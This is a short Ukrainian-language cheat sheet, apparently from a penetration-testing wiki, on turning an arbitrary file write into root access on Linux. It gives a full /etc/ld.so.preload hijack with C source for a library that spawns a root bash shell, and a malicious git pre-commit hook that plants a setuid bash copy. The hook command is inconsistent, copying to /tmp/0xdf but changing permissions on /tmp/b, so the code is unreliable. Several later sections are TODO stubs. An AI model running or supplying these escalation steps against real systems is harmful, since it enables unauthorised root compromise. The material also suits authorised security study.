Arbitrary File Write to Root

/etc/ld.so.preload

Цей файл працює як LD_PRELOAD змінна середовища, але він також працює в SUID бінарних файлів. Якщо ви можете створити або змінити його, ви можете просто додати шлях до бібліотеки, яка буде завантажена з кожним виконаним бінарним файлом.

Наприклад: echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Git hooks

Git hooks - це сценарії, які виконуються під час різних подій в репозиторії git, наприклад, коли створюється коміт, злиття... Таким чином, якщо привілейований сценарій або користувач часто виконує ці дії і може записувати в папку .git, це може бути використано для підвищення привілеїв.

Наприклад, можна створити сценарій в git-репозиторії в .git/hooks, щоб він завжди виконувався при створенні нового коміту:

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit

Файли Cron & Time

TODO

Файли Service & Socket

TODO

binfmt_misc

Файл, розташований в /proc/sys/fs/binfmt_misc, вказує, який виконувати бінарний файл для виконання файлів певного типу. TODO: перевірте вимоги для використання цього для виконання оберненого shell, коли відкрито файл звичайного типу.